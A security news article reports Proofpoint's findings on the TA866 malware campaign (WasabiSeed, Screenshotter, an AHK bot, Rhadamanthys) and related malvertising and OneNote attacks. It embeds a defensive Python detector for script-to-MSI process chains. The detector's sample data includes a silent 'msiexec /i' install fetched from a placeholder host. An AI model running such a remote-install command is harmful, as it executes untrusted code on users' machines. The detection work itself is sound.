
A previously unknown attacker is targeting companies in the United States and Germany with bespoke malware designed to steal sensitive information.
Proofpoint, an enterprise security company that tracks the activity cluster under the name Screentime, said the group, dubbed TA866, is likely financially motivated.
“TA866 is linked to the availability of custom tools, the ability to purchase tools and services from other vendors, and the increasing activity of organized attackers capable of conducting well-thought-out attacks at scale,” the company said.
The campaign launched by the attackers is said to have started around October 3, 2022. The attacks were launched via emails containing booby-trap attachments or URLs leading to malware. Attachments range from Microsoft Publisher files laced with macros to PDFs with URLs pointing to JavaScript files.
Intrusions also utilize conversation hijacking to lure recipients into clicking seemingly harmless URLs, initiating a multi-stage attack chain.
Regardless of the delivery method, running the downloaded JavaScript file launches an MSI installer, which unpacks a VBScript called WasabiSeed. WasabiSeed serves as a downloader that retrieves the next stage of malware from remote servers.
One of the payloads downloaded by WasabiSeed is Screenshotter. This utility periodically takes screenshots of the victim’s desktop and sends the information to a command and control (C2) server.
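The JavaScript-to-MSI-to-VBScript chain described above is visible in endpoint process-creation telemetry. The following Python detector is an added example, not code from the article or from Proofpoint; the event layout, process names and paths are constructed sample data and assumptions.

```python
"""Added example: flag a script host (wscript/cscript) launching msiexec, and
msiexec in turn spawning another script host, over constructed process events."""
from collections import defaultdict

# Constructed sample events: (event_id, parent_pid, pid, image, command_line).
# These are illustrative values only, not indicators from the article.
SAMPLE_EVENTS = [
    (1, 400, 500, r"C:\Windows\explorer.exe", "explorer.exe"),
    (2, 500, 510, r"C:\Windows\System32\wscript.exe",
     r'wscript.exe "C:\Users\u\Downloads\invoice.js"'),
    (3, 510, 520, r"C:\Windows\System32\msiexec.exe",
     "msiexec.exe /i http://example.invalid/pkg.msi /q"),
    (4, 520, 530, r"C:\Windows\System32\wscript.exe",
     r'wscript.exe "C:\Users\u\AppData\Local\Temp\stage.vbs"'),
    (5, 500, 540, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def _name(image):
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def find_script_to_msi_chains(events):
    """Return one hit per msiexec process whose parent is a script host.

    Each hit records whether the MSI package came from a URL and which
    child script hosts msiexec spawned (the unpacked VBScript stage)."""
    by_pid = {e[2]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e[1]].append(e)
    hits = []
    for e in events:
        if _name(e[3]) != "msiexec.exe":
            continue
        parent = by_pid.get(e[1])
        if parent is None or _name(parent[3]) not in SCRIPT_HOSTS:
            continue
        hits.append({
            "msiexec_pid": e[2],
            "parent_pid": parent[2],
            "remote_package": "http" in e[4].lower(),
            "script_children": [c[2] for c in children[e[2]]
                                if _name(c[3]) in SCRIPT_HOSTS],
        })
    return hits


if __name__ == "__main__":
    for hit in find_script_to_msi_chains(SAMPLE_EVENTS):
        print(hit)
```

The same parent/child logic maps directly onto Sysmon Event ID 1 or EDR process-start records once the tuple fields are swapped for the real schema.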
“This is useful for attackers during the reconnaissance and victim profiling stages,” said Proofpoint researcher Axel F.
A successful reconnaissance phase is followed by post-exploitation malware distribution. Selected attacks deploy an AutoHotKey (AHK)-based bot to drop an information stealer called Rhadamanthys.
According to Proofpoint, the URLs used in the campaign pass through a traffic direction system (TDS) called 404 TDS, which only lets the attackers deliver malware to victims who meet a certain set of criteria, such as geography, browser application, and operating system.
The origin of TA866 is still unknown, but Russian variable names and comments have been observed in the AHK bot source code, and its 2020 variant was used in attacks targeting Canadian and US banks. The malware is also suspected to have been used as far back as April 2019.
“Using Screenshotter to gather information about compromised hosts prior to deploying additional payloads demonstrates that attackers are manually confirming infections and identifying high-value targets,” said Proofpoint.

“It is important to note that a successful compromise would require the user to click a malicious link and, if successfully filtered, manipulate a JavaScript file to download and execute an additional payload.”
The findings come amid a surge in threat actors trying new ways to execute code on targeted devices after Microsoft blocked macros in Office files downloaded from the internet by default.
This includes using search engine optimization (SEO) poisoning, malvertising, and brand spoofing to distribute malware by packaging payloads as popular software such as remote desktop apps and online meeting platforms.
Additionally, in a new campaign documented by SentinelOne, fraudulent ads in Google search results were used to redirect unsuspecting users to a credential phishing website designed to steal their Amazon Web Services (AWS) logins.
“The surge in malicious Google ads leading to AWS phishing websites poses a serious threat not only to the average user, but to network and cloud administrators,” said the cybersecurity firm.
“These attacks are easy to launch, and combined with the large and diverse audiences that Google Ads can reach, make them particularly powerful threats.”
Another technique that has seen a surge in recent months is the exploitation of new file formats such as Microsoft OneNote and Publisher documents to distribute malware.
This attack is similar to those using other types of malicious Office files: the email recipient is tricked into opening the document and clicking a fake button, which runs the embedded HTA code to retrieve the Qakbot malware.
Sophos researcher Andrew Brandt said:
“OneNote .one notebooks will likely end up being truncated as email attachments as the next file format, but for now it remains a permanent risk.”